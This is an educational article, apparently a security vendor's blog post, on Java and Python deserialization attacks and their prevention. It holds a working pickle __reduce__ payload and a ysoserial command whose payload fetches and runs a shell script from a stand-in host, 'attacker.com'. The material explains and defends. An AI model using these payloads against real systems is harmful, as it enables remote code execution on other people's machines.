Deserialization vulnerabilities have been responsible for some of the most impactful breaches in the last decade. Apache Struts, Jenkins, WebLogic, JBoss -- the list of major platforms compromised through deserialization is long. The attack is conceptually simple: send specially crafted serialized data to an application that deserializes it without validation, and achieve remote code execution.
What makes deserialization attacks so dangerous is that they target a fundamental operation. Serialization converts objects to bytes for storage or transmission. Deserialization converts those bytes back to objects. Every application that receives data from external sources potentially deserializes it. And in many languages, deserialization can trigger arbitrary code execution by design.
Java Deserialization
Java's native serialization (ObjectInputStream) is the most notorious source of deserialization vulnerabilities. When Java deserializes an object, it calls various methods on the reconstructed object -- readObject(), readResolve(), finalize(), and others. If the class being deserialized has a readObject() method that performs dangerous operations, the attacker controls those operations through the serialized data.
The gadget chain concept. Attackers do not need to find a class with a directly exploitable readObject() method. Instead, they chain together multiple classes (gadgets) that are already on the application's classpath. Each gadget performs a small operation, and chaining them together achieves code execution.
The classic example is the Apache Commons Collections gadget chain:
- A
HashMapcallshashCode()on its keys during deserialization - The key is a
TiedMapEntrywhosehashCode()callsgetValue()on aLazyMap - The
LazyMapcallstransform()on aChainedTransformer - The
ChainedTransformerchainsConstantTransformer,InvokerTransformer, etc. - The final transformer calls
Runtime.exec()with the attacker's command
The attacker constructs a serialized HashMap containing this chain. When the application deserializes it, the chain triggers and the command executes.
Common vulnerable entry points:
- RMI (Remote Method Invocation) endpoints
- JMX (Java Management Extensions) over RMI
- Custom network protocols using Java serialization
- HTTP parameters or cookies containing Base64-encoded serialized objects
- Message queues (JMS) using Java serialization
- Caching systems (Ehcache, Hazelcast) using Java serialization
Detection indicators:
- Binary data starting with
AC ED 00 05(Java serialization magic bytes) - Base64-encoded data that decodes to the above magic bytes
- The string
rO0ABat the start of Base64 data (Base64-encoded Java serialization header)
Python Pickle Deserialization
Python's pickle module is explicitly documented as insecure: "The pickle module is not secure. Only unpickle data you trust." Despite this warning, pickle deserialization of untrusted data appears in production code regularly.
Pickle exploitation is straightforward. The __reduce__ method defines how an object should be reconstructed during unpickling. An attacker creates a class with a __reduce__ method that returns a tuple of (os.system, ("malicious command",)), serializes it, and sends it to the application.
import pickle
import os
class Exploit:
def __reduce__(self):
return (os.system, ("id",))
payload = pickle.dumps(Exploit())
# Send payload to vulnerable endpoint
When the application calls pickle.loads(payload), Python calls os.system("id").
Common vulnerable entry points:
- Flask session cookies using pickle serialization (default in older versions)
- Celery task serialization configured to use pickle
- Redis or memcached caching with pickle serialization
- Machine learning model loading using
pickle.load() - Data interchange between Python services
- Scientific computing pipelines loading .pkl files
Other dangerous Python deserializers:
yaml.load()(withoutLoader=SafeLoader) executes arbitrary Python through!!python/object/apply:jsonpickledeserializes arbitrary Python objects from JSONshelveuses pickle internally
Exploitation Tools
ysoserial (Java). The standard tool for generating Java deserialization payloads. It includes dozens of gadget chains for common libraries:
java -jar ysoserial.jar CommonsCollections1 "curl http://attacker.com/shell.sh | bash"
This generates a serialized Java object containing the CommonsCollections1 gadget chain that executes the specified command.
ysoserial.net (.NET). The .NET equivalent for BinaryFormatter, ObjectStateFormatter, SoapFormatter, and other .NET serializers.
pimpmykali/pickle-exploit. Various tools generate malicious pickle payloads for Python deserialization attacks.
GadgetProbe. Identifies classes available on the remote classpath by observing deserialization errors, helping attackers determine which gadget chains will work.
Prevention: Java
Do not use Java native serialization. This is the most effective defense. Use JSON, Protocol Buffers, or other format-specific serializers that do not execute arbitrary code during parsing.
If you must use Java serialization:
- ObjectInputFilter (Java 9+). Configure a filter that restricts which classes can be deserialized:
ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
"com.myapp.model.*;!*"
);
ObjectInputStream ois = new ObjectInputStream(input);
ois.setObjectInputFilter(filter);
-
Look-ahead deserialization. Inspect the serialized stream before deserializing. Libraries like Apache Commons IO's
ValidatingObjectInputStreamand notsoserial provide this capability. -
Remove dangerous gadget libraries. If your application does not use Apache Commons Collections, remove it from the classpath. Fewer libraries mean fewer available gadget chains. However, this is not sufficient as a sole defense -- new gadget chains using common libraries are discovered regularly.
-
Use a serialization firewall. Contrast Security and other RASP (Runtime Application Self-Protection) solutions can detect and block deserialization attacks at runtime.
Prevention: Python
Never unpickle untrusted data. Use JSON for data interchange. If you need to serialize Python objects, use a safe serializer:
import json
# SAFE: JSON serialization
data = json.loads(user_input)
# DANGEROUS: Pickle deserialization
data = pickle.loads(user_input) # Never do this with untrusted input
Configure safe YAML loading:
import yaml
# SAFE
data = yaml.safe_load(user_input)
# DANGEROUS
data = yaml.load(user_input, Loader=yaml.FullLoader) # Still risky
data = yaml.load(user_input) # Extremely dangerous
Configure Celery to use JSON:
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
Flask session security:
# Use server-side sessions or ensure session data uses JSON, not pickle
# Modern Flask uses itsdangerous with JSON by default
Machine learning model loading. Loading ML models from untrusted sources is inherently dangerous because most model formats (pickle, joblib, SavedModel) can execute arbitrary code. Verify model integrity with checksums and load only from trusted sources.
Detection and Monitoring
- Monitor for deserialization magic bytes in HTTP traffic
- Log deserialization operations and the classes being deserialized
- Alert on deserialization of classes outside the expected allowlist
- Use RASP solutions that can detect and block deserialization attacks in real-time
- Scan code for
ObjectInputStream,pickle.loads,yaml.load, and other dangerous calls
How Safeguard.sh Helps
Safeguard.sh is particularly valuable for deserialization defense because the vulnerability often lies in third-party libraries on your classpath. Gadget chains use classes from libraries like Apache Commons Collections, Spring Framework, and other common dependencies. Safeguard.sh tracks which versions of these libraries have known gadget chains and alerts when your SBOM includes vulnerable versions. By providing continuous monitoring of your dependency tree, Safeguard.sh helps you remove or update the libraries that make deserialization attacks possible.